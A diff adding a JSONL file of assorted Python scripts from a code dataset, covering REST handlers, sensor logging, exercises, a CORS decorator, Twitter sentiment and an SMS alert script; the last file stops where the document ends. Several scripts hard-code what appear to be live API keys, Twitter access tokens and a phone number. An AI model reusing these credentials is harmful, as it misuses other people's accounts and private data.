diff --git "a/4025.jsonl" "b/4025.jsonl" new file mode 100644--- /dev/null +++ "b/4025.jsonl" @@ -0,0 +1,793 @@ +{"seq_id":"480604320","text":"import webapp2\nfrom google.appengine.ext import ndb\nimport json\nimport db_models\nfrom datetime import datetime\n\nclass Vinyls(webapp2.RequestHandler):\n def post(self):\n \"\"\" Creates a new Vinyl Entity\n POST Body variables:\n name - required. Vinyl name.\n date - not required. The date of recording.\n no_tracks - required. The number of tracks on the album.\n length - required. The number of minutes of the album.\n genre - required. The genre of the album as a string.\n description - not required. The description of the album.\n artist - required. The name of the artist.\n \"\"\"\n #Only return a JSON, and warn user if it is not requested\n if 'application/json' not in self.request.accept:\n self.response.status = 406\n self.response.write(\"API only supports JSON\")\n return\n \n new_vinyl = db_models.Vinyl()\n name = self.request.get('name', default_value=None)\n date = self.request.get('date', default_value=None)\n no_tracks = self.request.get('no_tracks', default_value=None)\n length = self.request.get('length', default_value=None)\n genre = self.request.get('genre', default_value=None)\n description = self.request.get('description', default_value=None)\n artist = self.request.get('artist', default_value=None)\n\n if name and no_tracks and length and genre and artist:\n #Check that a vinyl by that name doesn't already exist\n q = db_models.Vinyl.query(db_models.Vinyl.name == name)\n match = q.fetch()\n if match:\n self.response.status = 400\n self.response.write(\"A vinyl already exists with that name.\\n\")\n return\n new_vinyl.name = name\n \n #Make sure the tracks supplied are integers\n try:\n new_vinyl.no_tracks = int(no_tracks)\n new_vinyl.length = int(length)\n except:\n self.response.status = 400\n self.response.write(\"Number of tracks and vinyl length must be integers.\\n\")\n return\n \n new_vinyl.genre = genre\n \n #Check that the artist ID exists\n try:\n q = db_models.Artists.get_by_id(int(artist))\n if q:\n new_vinyl.artist = ndb.Key(db_models.Artists, int(artist))\n else:\n self.response.status = 404\n self.response.write(\"The artist id was not found for that artist (perhaps a POST to /artist is in order?).\\n\")\n return\n except:\n self.response.status = 400\n self.response.write(\"The artist id must be a numeric value.\\n\")\n return\n\n if description:\n new_vinyl.description = description\n \n #Make sure the date is formatted correctly\n if date:\n try:\n new_vinyl.date = datetime.strptime(date, '%Y-%m-%d').date()\n except:\n self.response.status = 400\n self.response.write(\"Date must be in YYYY-MM-DD format.\\n\")\n return\n key = new_vinyl.put()\n #Add to the artist's list of albums\n q = db_models.Artists.get_by_id(int(artist))\n q.albums.append(ndb.Key(db_models.Vinyl, new_vinyl.key.id()))\n q.put()\n \n out = new_vinyl.to_dict()\n self.response.write(json.dumps(out))\n return\n else:\n self.response.status = 400\n self.response.status_message = \"Name, number of tracks, length, genre and artist are required.\\n\" \n return\n \n def get(self, **kwargs):\n \"\"\" Requests vinyls\n GET Body variables:\n id - if available, gives info on one vinyl by id, otherwise, provides all\n \"\"\"\n if 'application/json' not in self.request.accept:\n self.response.status = 406\n self.response.write(\"API only supports JSON.\\n\")\n return\n if 'id' in kwargs:\n try:\n out = ndb.Key(db_models.Vinyl, int(kwargs['id'])).get().to_dict()\n self.response.write(json.dumps(out))\n except:\n self.response.status = 404\n self.response.write(\"No vinyl found with supplied ID.\\n\")\n return\n else:\n q = db_models.Vinyl.query()\n all = q.fetch()\n newl = []\n for x in all:\n newl.append(x.to_dict())\n self.response.write(json.dumps(newl))\n \n def put(self, **kwargs):\n \"\"\" Updates a vinyl\n PUT Body variables:\n id - if available, updates info on one vinyl by id, otherwise, error\n \"\"\"\n if 'application/json' not in self.request.accept:\n self.response.status = 406\n self.response.status.write(\"API only supports JSON.\\n\")\n return\n #If id is available, just update that one\n if 'id' in kwargs:\n #First check that the id is correct\n try:\n updatevinyl = ndb.Key(db_models.Vinyl, int(kwargs['id'])).get()\n name = self.request.get('name', default_value=None)\n date = self.request.get('date', default_value=None)\n no_tracks = self.request.get('no_tracks', default_value=None)\n length = self.request.get('length', default_value=None)\n genre = self.request.get('genre', default_value=None)\n description = self.request.get('description', default_value=None)\n artist = self.request.get('artist', default_value=None)\n except:\n self.response.status = 404\n self.response.write(\"No vinyl found with supplied ID.\\n\")\n return\n #Update just the name\n if name:\n q = db_models.Vinyl.query(db_models.Vinyl.name == name)\n match = q.fetch()\n if match:\n self.response.status = 400\n self.response.write(\"A vinyl already exists with that name.\\n\")\n return\n updatevinyl.name = name\n \n #Make sure the tracks supplied are integers\n if no_tracks:\n try:\n updatevinyl.no_tracks = int(no_tracks)\n except:\n self.response.status = 400\n self.response.write(\"Number of tracks must be integers.\\n\")\n return\n \n #Update date\n if date:\n try:\n updatevinyl.date = datetime.strptime(date, '%Y-%m-%d').date()\n except:\n self.response.status = 400\n self.response.write(\"Date must be in YYYY-MM-DD format.\\n\")\n return\n \n #Make sure the length supplied are integers\n if length:\n try:\n updatevinyl.length = int(length)\n except:\n self.response.status = 400\n self.response.write(\"Vinyl length must be an integer.\\n\")\n return\n \n #Update only genre\n if genre:\n updatevinyl.genre = genre\n \n #Update only description \n if description:\n updatevinyl.description = description\n \n #Update only artist\n if artist:\n #Check that the artist ID exists\n try:\n q = db_models.Artists.get_by_id(int(artist))\n if q:\n updatevinyl.artist = ndb.Key(db_models.Artists, int(artist))\n else:\n self.response.status = 404\n self.response.write(\"The artist id was not found for that artist (perhaps a POST to /artist is in order?).\\n\")\n return\n except:\n self.response.status = 400\n self.response.write(\"The artist id must be a numeric value.\\n\")\n return\n \n updatevinyl.put()\n out = updatevinyl.to_dict()\n self.response.write(json.dumps(out))\n return \n \n #Otherwise, provided an error\n else:\n self.response.status = 403\n self.response.write(\"Forbidden: Update all vinyls is not allowed\")\n return\n \n def delete(self, **kwargs):\n \"\"\" Deletes a vinyl\n GET Body variables:\n id - if available, deletes info on one vinyl by id, otherwise, error message\n \"\"\"\n if 'application/json' not in self.request.accept:\n self.response.status = 406\n self.response.write(\"API only supports JSON.\\n\")\n return\n #If id is available, just delete that one\n if 'id' in kwargs:\n #First check that the id is correct\n try:\n deletevinyl = ndb.Key(db_models.Vinyl, int(kwargs['id'])).get()\n out = deletevinyl.to_dict()\n #Get the associated artist with the album\n q = db_models.Artists.get_by_id(int(out['artist']))\n \n #if the album exists, delete it from the list\n if q.albums:\n newalbums = []\n for album in q.albums:\n if album.id() != deletevinyl.key.id():\n newalbums.append(album)\n q.albums = newalbums\n q.put()\n \n #Delete all comments associated with the vinyl being deleted\n q = db_models.Comments.query(db_models.Comments.vinylID == deletevinyl.key)\n match = q.fetch()\n if match:\n for x in match:\n x.key.delete()\n \n deletevinyl.key.delete()\n self.response.write(\"Delete Successful.\\n\")\n \n except:\n self.response.status = 404\n self.response.write(\"No vinyl found with supplied ID.\\n\")\n return\n \n #Otherwise, provided an error\n else:\n self.response.status = 403\n self.response.write(\"Forbidden: Delete all vinyls is not allowed\\n\")\n return","sub_path":"vinyls.py","file_name":"vinyls.py","file_ext":"py","file_size_in_byte":9016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"60323140","text":"from machine import ADC\r\nimport os\r\nimport time\r\nadc = ADC(0)\r\n#adc_c = adc.channel(pin='P13',attn=ADC.ATTN_6DB) #pour une pile de 1.259V , print(adc_c.value()) donne 2520\r\nadc_c = adc.channel(pin='P13',attn=ADC.ATTN_0DB) #pour une pile de 0.629V , print(adc_c.value()) donne 2070\r\n\r\ndef createFile(nom):\r\n nom = nom+(\".txt\")\r\n file = open(nom,\"w\")\r\n return file\r\n\r\ndef writeFile(data,file):\r\n file.write(str(data)+(\"\\n\"))\r\n return\r\n\r\nfile = createFile(\"save3\")\r\n\r\nfor i in range(1000):\r\n adc_c()\r\n tension_thermi = adc_c.value()\r\n print(tension_thermi)\r\n writeFile(str(tension_thermi),file)\r\n time.sleep(0.2)\r\n\r\nfile.close()\r\n","sub_path":"test capteur/thermi/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"729570","text":"'''\nSum all the elements in a list up to but not including\nthe first even number.\n'''\n\ndef sumUntilEven(lst):\n # your code here\n sum_lst = 0\n index = 0\n while index < len(lst) and lst[index] % 2 != 0:\n sum_lst = sum_lst + lst[index]\n index = index + 1\n return sum_lst\n\n\nprint(sumUntilEven([1, 3, 5, 7, 9, 2, 13, 11, 15]))\n","sub_path":"10_lists/exercises/10.30.11.py","file_name":"10.30.11.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"553484659","text":"from datetime import timedelta\r\nfrom flask import make_response, request, current_app\r\nfrom functools import update_wrapper\r\n\r\ndef crossdomain(origin=None, methods= None, headers= None,max_age=21600,attach_to_all=True,automatic_option=True):\r\n if methods is not None :\r\n methods=', '.join(sorted(x.upper() for x in methods))\r\n\r\n if headers is not None and not isinstance(headers,str) :\r\n headers=', '.join(x.upper() for x in headers)\r\n\r\n if not isinstance(origin,str) :\r\n origin=', '.join(origin)\r\n\r\n if isinstance(max_age,timedelta) :\r\n max_age=max_age.total_seconds()\r\n\r\n def get_methods():\r\n\r\n if methods is not None :\r\n return methods\r\n\r\n option_response=current_app.make_default_options_response()\r\n return option_response.headers['allow']\r\n\r\n def decorator(f):\r\n\r\n def wrapped_function(*args,**kwargs):\r\n\r\n if automatic_option and request.method=='OPTIONS' :\r\n resp = current_app.make_default_option_response()\r\n else:\r\n resp = make_response(f(*args,**kwargs))\r\n\r\n if not attach_to_all and request.method != 'OPTIONS' :\r\n return resp\r\n\r\n h = resp.headers\r\n h['Access-Control-Allow-Origin'] = origin\r\n h['Access-Control-Aloow-Methods'] = get_methods()\r\n h['Access-Control-Max-Age'] = str(max_age)\r\n h['Access-Control-Allow-Credentials'] = 'true'\r\n h['Access-Control-Allow-Headers']= \"Origin, X-Requested-With, Content-Type, Accept, Authorization\"\r\n\r\n if headers is not None :\r\n h['Access-Control-Allow-Headers']=headers\r\n\r\n return resp\r\n\r\n f.provide_automatic_options = False\r\n return update_wrapper(wrapped_function,f)\r\n return decorator\r\n\r\n\r\n\r\n\r\n","sub_path":"Backend/crossDomain.py","file_name":"crossDomain.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"582709299","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 18 15:45:59 2018\n\n@author: anand\n\"\"\"\n\nimport requests\nimport json\nfrom googleplaces import GooglePlaces, types, lang\nimport re \n\ndef find_location():\n\n send_url = \"http://api.ipstack.com/check?access_key=7330ebb47134f617c30ce56abdb246e3\"\n geo_req = requests.get(send_url)\n geo_json = json.loads(geo_req.text)\n latitude = geo_json['latitude']\n longitude = geo_json['longitude']\n city = geo_json['city']\n\n location=str(latitude)+' '+str(longitude)\n\n\n return location\n\ndef find_hospitals_police(location):\n \n google_places = GooglePlaces(\"AIzaSyCNLxPxFmG3kfrALBUkRFb_R5UdemVnqqQ\")\n\n hospitals = google_places.nearby_search(\n location=location,\n radius=500, types=[types.TYPE_HOSPITAL])\n\n hosp=str(hospitals.places[0])\n hosp_spl= hosp.split('\"')\n hosp=hosp_spl[1]\n police_stations = google_places.nearby_search(\n location=location,\n radius=500, types=[types.TYPE_POLICE])\n pol=str(police_stations.places[0])\n pol_spl=pol.split('\"')\n pol=pol_spl[1]\n \n return hosp,pol\n\n\n\ndef send_sms(h1,p1):\n api_key=\" \" #enter your api key here \n url = \"https://www.fast2sms.com/dev/bulk\"\n\n payload1 = \"sender_id=FSTSMS&message=. /n Nearest Hosp:\"+h1+\"/n Nearest Police Station:\"+p1+\"&language=english&route=p&numbers=9841069732\"\n \n headers = {\n\n 'authorization': api_key,\n \n 'Content-Type': \"application/x-www-form-urlencoded\",\n\n 'Cache-Control': \"no-cache\",\n\n }\n \n response1 = requests.request(\"POST\", url, data=payload1, headers=headers)\n \n\n print(response1.text)\n\n\nlocation=find_location()\n\nhosp,pol=find_hospitals_police(location)\n\nsend_sms(hosp,pol)\n\n \n \n \n \n \n \n\n\n","sub_path":"alert_detection.py","file_name":"alert_detection.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"438912482","text":"try:\n import uasyncio as asyncio\nexcept Exception:\n import asyncio as asyncio\n\n\nclass WIFIActions:\n\n def __init__(self, env, core):\n self.mbus = core.mbus\n self.umod = core.umod\n self.mbus.sub_h(uid=\"WIFI-ACT\", topic=\"WIFI/#\", env=env, func=\"mod_ctrl\")\n\n def mod_state(self, mods, up, pld, cmd):\n for mod in mods:\n if mod[\"active\"] == \"1\" and mod[\"up\"] in up:\n mod_name = mod[\"name\"].split(\"cfg_\", 1)\n if mod_name:\n self.mbus.pub_h(tpc=\"{}/ctr/{}\".format(mod_name[-1], cmd), pld=pld)\n\n\n async def mod_ctrl(self, _id, _key, _pld, _rt):\n\n mods = await self.umod.call_db(method=\"_scan\", table=\"modules\")\n\n if mods:\n\n if _id == \"WIFI/sta/ip\" and _key == \"set\":\n self.mod_state(mods, [\"sta\", \"ap\"], _pld, \"start\")\n\n if _id == \"WIFI/ap/ip\" and _key == \"set\":\n self.mod_state(mods, [\"ap\"], _pld, \"start\")\n\n if _id == \"WIFI/sta/ip\" and _key == \"clear\":\n self.mod_state(mods, [\"sta\"], _pld, \"stop\")","sub_path":"ports/esp32/boards/temp/STRAGA_dev_kit1_8mb_core/modules/mod/net/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"401995537","text":"import requests\r\n\r\nrequests.post('https://petstore.swagger.io/v2/user',\r\n data={\"id\": \"1\",\r\n \"username\": \"User1\",\r\n \"firstName\": \"Ilya\",\r\n \"lastName\": \"Prokofiev\",\r\n \"email\": \"gsi@mail.ru\",\r\n \"password\": \"richard\",\r\n \"phone\": \"+375\",\r\n \"userStatus\": \"1\"})\r\n\r\nlink = 'https://petstore.swagger.io/v2/user/User1'\r\n\r\nr = requests.get(link)\r\nif r.status_code == 200:\r\n print ('User created')\r\nelse:\r\n print('User doesnt exist')\r\n\r\nrequests.put(link,\r\n data={\"id\": \"1\",\r\n \"username\": \"User1\",\r\n \"firstName\": \"Ilias\",\r\n \"lastName\": \"Prokofyeu\",\r\n \"email\": \"gsi@yandex.ru\",\r\n \"password\": \"richard\",\r\n \"phone\": \"+37529\",\r\n \"userStatus\": \"1\"})\r\n\r\nr = requests.get(link)\r\nif r.status_code == 200:\r\n print ('User updated')\r\nelse:\r\n print('Fail: user was not updated')\r\n\r\nrequests.delete(link)\r\nr = requests.get(link)\r\nif r.status_code == 200:\r\n print ('User deleted')\r\nelse:\r\n print('User was not deleted')\r\n\r\nr = requests.get(link)\r\nif r.status_code == 404:\r\n print ('User is not existing')\r\nelse:\r\n print('Try again')\r\n","sub_path":"CRUD via python/nik.py","file_name":"nik.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"594585543","text":"from sqlalchemy import Column, Integer, String, DateTime, func\n\n\nclass SurrogatePK:\n \"\"\"A mixin that adds a surrogate integer 'primary key' column named ``id``\n to any declarative-mapped class.\"\"\"\n\n __table_args__ = {'extend_existing': True}\n\n id = Column(Integer, primary_key=True)\n\n\nclass ValueMixin:\n __table_args__ = {'extend_existing': True}\n\n value = Column(String, unique=True, nullable=False)\n\n def __str__(self) -> str:\n return f\"{self.__class__.__name__}: {self.value}\"\n\n\nclass TimeSign:\n __table_args__ = {'extend_existing': True}\n\n created_at = Column(DateTime(timezone=True), default=func.now())\n updated_at = Column(DateTime(timezone=True), default=func.now(), onupdate=func.now())\n","sub_path":"utils/sqla/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"46806462","text":"def hotel_kosten(nachten):\n return nachten - (nachten // 3) * 140.50\n\n\ndef vliegtuig_kosten(stad):\n if stad == \"Barcelona\":\n return 183\n elif stad == \"Rome\":\n return 220\n elif stad == \"Berlijn\":\n return 125\n else:\n return 400\n\n\ndef huurauto_kosten(aantal_dagen):\n vast_auto = aantal_dagen * 40\n if aantal_dagen > 7:\n auto = vast_auto - 50\n return auto\n elif aantal_dagen < 7 and aantal_dagen > 3:\n auto = vast_auto - 20\n return auto\n else:\n auto = vast_auto\n return auto\n\ndef reis_kosten(stad, aantal_dagen):\n if stad !=\"Barcelona\" and stad !=\"Rome\" and stad !=\"Berlijn\" and stad!=\"Oslo\":\n print(\"foutboodschap\")\n else:\n hotel_kosten(nachten)+ huurauto_kosten(aantal_dagen) + vliegtuig_kosten(stad)\n\n\na = int(input(\"Geef hier het aantal nachten in:\"))\nb = str(input(\"Geef hier de verblijfplaats in\"))\nc = a + 1 #aantal dagen\n\nprint(reis_kosten(b,c))\nprint(hotel_kosten(a))","sub_path":"H5/Oefening_5.9.py","file_name":"Oefening_5.9.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"221084564","text":"# 3.4.1.15 Triangle\r\n# new class will be called Triangle and this is the list of our expectations:\r\n\r\n# the constructor accepts three arguments - all of them are objects of the Point class;\r\n# the points are stored inside the object as a private list;\r\n# the class provides a parameterless method called perimeter(),\r\n# which calculates the perimeter of the triangle described by the three points;\r\n\r\nfrom math import hypot\r\n\r\n\r\nclass Point:\r\n def __init__(self, x=0.0, y=0.0):\r\n self.__x = x\r\n self.__y = y\r\n\r\n def getx(self):\r\n return self.__x\r\n\r\n def gety(self):\r\n return self.__y\r\n\r\n def distance_from_xy(self, x, y):\r\n if x > self.__x:\r\n hx = x - self.__x\r\n else:\r\n hx = self.__x - x\r\n if y > self.__y:\r\n hy = y - self.__y\r\n else:\r\n hy = self.__y - y\r\n return hypot(hx, hy)\r\n\r\n def distance_from_point(self, point):\r\n px = point.getx()\r\n py = point.gety()\r\n return self.distance_from_xy(px, py)\r\n\r\n\r\nclass Triangle:\r\n def __init__(self, vertice1, vertice2, vertice3):\r\n self.__vertice1 = vertice1\r\n self.__vertice2 = vertice2\r\n self.__vertice3 = vertice3\r\n\r\n def perimeter(self):\r\n s1 = self.__vertice1.distance_from_point(self.__vertice2)\r\n s2 = self.__vertice2.distance_from_point(self.__vertice3)\r\n s3 = self.__vertice3.distance_from_point(self.__vertice1)\r\n return s1 + s2 + s3\r\n\r\n\r\ntriangle = Triangle(Point(0, 0), Point(1, 0), Point(0, 1))\r\nprint(triangle.perimeter()) # 3.414213562373095\r\n","sub_path":"my_Triangle.py","file_name":"my_Triangle.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"61547733","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom values import *\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\n\ndef RK4_Integrate(xstart, ystart, dy, xend, numstep = 1000):\n\tx = np.linspace(xstart, xend, numstep)\n\tsteplen = x[1] - x[0]\n\ty = np.zeros(numstep)\n\ty[0] = ystart\n\tfor i in range(numstep - 1):\n\t\tk1 = steplen * dy(x[i])\n\t\tk2 = steplen * dy(x[i] + steplen / 2)\n\t\tk3 = steplen * dy(x[i] + steplen / 2)\n\t\tk4 = steplen * dy(x[i] + steplen)\n\t\ty[i + 1] = y[i] + (k1 + 2 * k2 + 2 * k3 + k4) / 6\n\treturn x, y\n\n\n\n# (E, Y) = RK4_Integrate(xstart = 0, xend = E_R_MAX, ystart = 0, dy = lambda arg: - dif(arg))\n\n\n# xs = 0\n# xe = 100\n# es = xs * 1E3 * CH_E\n# ee = xe * 1E3 * CH_E\n# (e, y) = RK4_Integrate(xstart = es, xend = ee, ystart = -Y[-1], dy = lambda arg: - dif(arg))\n\n\n\n#plt.semilogy(e / 1E3 / CH_E, y * 1E3 * 31536000)\nx = np.linspace(0.1, 100, 1000)\ny1 = np.zeros(1000)\ny2 = np.zeros(1000)\ny3 = np.zeros(1000)\n# e = x * 1E3 * CH_E\n# y2 = np.array(list(map(DIF, e))) * 1E3 * CH_E * 1E3 * 31536000 #per keV * ton * year\n\n# file = open('73Ge.dat', 'w')\n# for i in range(1000):\n# \tfile.write('%.5e\\t%.5e\\n' % (x[i], y2[i]))\n\nfile1 = open('131Xe.dat', 'r')\nfile2 = open('73Ge.dat', 'r')\nfile3 = open('40Ar.dat', 'r')\nline1 = file1.readline()\nline2 = file2.readline()\nline3 = file3.readline()\nn = 0\nwhile line1 and line2 and line3:\n\ty1[n] = float(line1.split('\\t')[-1])\n\ty2[n] = float(line2.split('\\t')[-1])\n\ty3[n] = float(line3.split('\\t')[-1])\n\tn += 1\n\tline1 = file1.readline()\n\tline2 = file2.readline()\n\tline3 = file3.readline()\n\nplt.figure(1, figsize = (8,6))\nplt.semilogy(x, y1, 'r')\nplt.semilogy(x, y2, 'g')\nplt.semilogy(x, y3, 'b')\nplt.legend(('Xe (A=131)', 'Ge (A=73)', 'Ar (A=40)'))\nplt.xlim([0,100])\nplt.xlabel('Nuclear Recoil Energy ' + r'$E_R$' + ' (keV)', size = 13, weight = 'bold')\nplt.ylabel('Rate ' + r'$dR/dE_R$' + ' (evts/keV/ton/year)', size = 13, weight = 'bold')\nplt.grid(b=True, which='major', color='grey', linestyle='--')\nplt.grid(b=True, which='minor', color='grey', linestyle=':', alpha = 0.4)\nplt.text(20, 0.5, r'$m_\\chi=100$GeV', horizontalalignment='center', verticalalignment='center', size = 15, weight = 'bold')\nplt.text(20, 0.3, r'$\\sigma_{\\chi-p}=10^{-45}$cm$^{2}$', horizontalalignment='center', verticalalignment='center', size = 15, weight = 'bold')\nplt.savefig('MyResult.png', dpi = 500)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Week2/NEWTRY/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"272845263","text":"n=int(input())\nnos=list(map(eval,input().split()))\nj=0\ncont=1\nm=0\ni=0\nwhile im:\n if smallm:\n m=c\n i+=1\nprint(m)\n\n\n\n\n\t\n\t\t\n\t\n\t\t\n\t\t\n\n","sub_path":"Pro26.py","file_name":"Pro26.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"98518980","text":"import tweepy\nimport matplotlib.pyplot as plt\nimport time\nimport json\nfrom textblob import TextBlob\nfrom tweepy.streaming import StreamListener\nimport re\n\nconsumer_key = 'ykU3M4ySMu5awQHcU2b1Td0uS'\nconsumer_secret = '9xkTXsldiSiQ38O4BO2feaLfparq7ZTmKUTmi2Ftx14V18Je0W'\naccess_token = '924306929660207104-FFGM4PyjGjKWd80PrHHxt5d2dObXemA'\naccess_token_secret = 'ezvyStkTjLP1MgcEeknmoPb8aJSidO8UK6mZCxoErmlsW'\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\n\n\nclass listener(StreamListener):\n def on_data(self, data):\n global initime\n t = int(calctime())\n all_data = json.loads(data)\n public_tweets = all_data['text'].encode('utf-8')\n public_tweets = ' '.join(re.findall('[a-zA-Z]+', public_tweets))\n str_tweets = TextBlob(public_tweets.strip())\n global positive\n global negative\n global count\n global compound\n count = count + 1\n senti = 0\n for sen in str_tweets:\n senti = senti + sen.sentiment.polarity\n if sen.sentiment.polarity >= 0:\n positive = positive + sen.sentiment.polarity\n else:\n negative = negative + sen.sentiment.polarity\n\n compound = compound + senti\n print(count)\n print(str_tweets)\n print(senti)\n # print str(positive)+ ' ' + str(negative) + ' ' + str(compound)\n\n plt.axis([0, 70, -20, 20])\n plt.xlabel('Time')\n plt.ylabel('Sentiment')\n plt.plot([t], [positive], 'go', [t], [negative], 'ro', [t], [compound], 'bo')\n plt.show()\n plt.pause(0.0001)\n if count == 200:\n return False\n else:\n return True\n\n def on_error(self, status):\n print(status)\n\n\ntwitterStream = tweepy.Stream(auth, listener(1))\ntwitterStream.filter(track=[\"katy perry\"])","sub_path":"liveEx.py","file_name":"liveEx.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"133670605","text":"from setuptools import setup\nfrom distutils.extension import Extension\n\nCYTHONIZE_EQUIPPED = False\n\ntry:\n from Cython.Build import cythonize\n CYTHONIZE_EQUIPPED = True\nexcept ImportError as e:\n print('INFO :: Couldn\\'t load Cython.')\n\nextensions = [\n Extension(\"telium.constant\", [\"telium/constant.py\"]),\n Extension(\"telium.payment\", [\"telium/payment.py\"]),\n Extension(\"telium.manager\", [\"telium/manager.py\"])\n]\n\nsetup(\n name='pyTeliumManager',\n version='2.3.0',\n author='Ahmed TAHRI, @Ousret',\n author_email='ahmed@tahri.space',\n description=('A cross-platform point of sales payment manager tool with Telium Manager '\n 'Support every device with Telium Manager like Ingenico terminals.'),\n license='MIT',\n packages=['telium'],\n test_suite='test',\n url='https://github.com/Ousret/pyTeliumManager',\n download_url='https://github.com/Ousret/pyTeliumManager/archive/2.3.0.tar.gz',\n install_requires=['pyserial>=3.3', 'pycountry>=17.0', 'payment_card_identifier>=0.1.2', 'hexdump', 'six'],\n tests_require=['Faker'],\n keywords=['ingenico', 'telium manager', 'telium', 'payment', 'credit card', 'debit card', 'visa', 'mastercard',\n 'merchant', 'pos'],\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Win32 (MS Windows)',\n 'Environment :: X11 Applications',\n 'Environment :: MacOS X',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.1',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n ],\n ext_modules=cythonize(extensions) if CYTHONIZE_EQUIPPED else None\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"429729094","text":"#!/usr/bin/python\n\n#https://www.tensorflow.org/versions/r0.7/tutorials/mnist/beginners/index.html\n\nimport tensorflow as tf\n\n#read data\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot = True)\n\n#placeholder to hold the input features\nx = tf.placeholder(tf.float32, [None, 784]);\n\n#define the parameters of the regression\nW = tf.Variable(tf.zeros([784, 10]))\nb = tf.Variable(tf.zeros([10]))\n\n#define the model\ny = tf.nn.softmax(tf.matmul(x, W) + b)\n\n#placeholder to hold the input labels\ny_ = tf.placeholder(tf.float32, [None, 10]); #for example, if digit 1: [0, 1, 0, 0, 0, 0, 0, 0, 0, 0]\n\n#define the cost function, cross entropy\ncross_entropy = -tf.reduce_sum(y_ * tf.log(y))\n\n#training step\ntrain_step = tf.train.GradientDescentOptimizer(0.01).minimize(cross_entropy)\n\n#now, run the computation\ninit = tf.initialize_all_variables()\n\nsess = tf.Session()\nsess.run(init)\n\n#learn in batches of 100 input data, 1000 times => 100 000 input data\nfor i in range(1000):\n if (i + 1) % 100 == 0:\n print(\"> iteration %d\" %(i + 1))\n batch_xs, batch_ys = mnist.train.next_batch(100)\n sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys})\n\n#now test the model\ncorrect_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\nprint(sess.run(b), sess.run(W))\nprint(\"accuracy: \", sess.run(accuracy, feed_dict={x: mnist.test.images, y_: mnist.test.labels}) * 100)\n","sub_path":"mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"82349127","text":"from .models import Event, Department\nfrom .forms import EventForm\n\nfrom datetime import date, timedelta\nfrom django.shortcuts import render, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\n\n\ndef index(request):\n departments_list = Department.objects.order_by('name')\n events_list = Event.objects.filter(event_date__gt = \n date.today()-timedelta(days=1)).order_by('event_date')\n context = {'events_list': events_list, \n 'departments_list' : departments_list}\n return render(request, 'events/index.html', context)\n\n\ndef department_events(request, department_name):\n departments_list = Department.objects.order_by('name')\n selected_department = get_object_or_404(Department, name=department_name)\n events_list = Event.objects.filter(department = selected_department, \n event_date__gt = date.today() - timedelta(days=1))\n context = {'events_list': events_list, \n 'departments_list' : departments_list, \n \"selected_department\": selected_department}\n return render(request, 'events/index.html', context)\n\n\ndef past_events(request):\n departments_list = Department.objects.order_by('name') \n events_list = Event.objects.filter(event_date__lt = date.today()) \n context = {'events_list': events_list, \n 'departments_list' : departments_list} \n return render(request, 'events/index.html', context)\n\n\n@login_required\ndef add_event(request):\n departments_list = Department.objects.order_by('name')\n if request.method == 'POST':\n form = EventForm(request.POST)\n if form.is_valid():\n event = Event()\n event.subject = request.POST.get('subject')\n event.title = request.POST.get('title')\n event.name = request.POST.get('name')\n event.surname = request.POST.get('surname')\n event.event_date = request.POST.get('event_date') \n event.duration = request.POST.get('duration')\n event.department = get_object_or_404(Department,\n 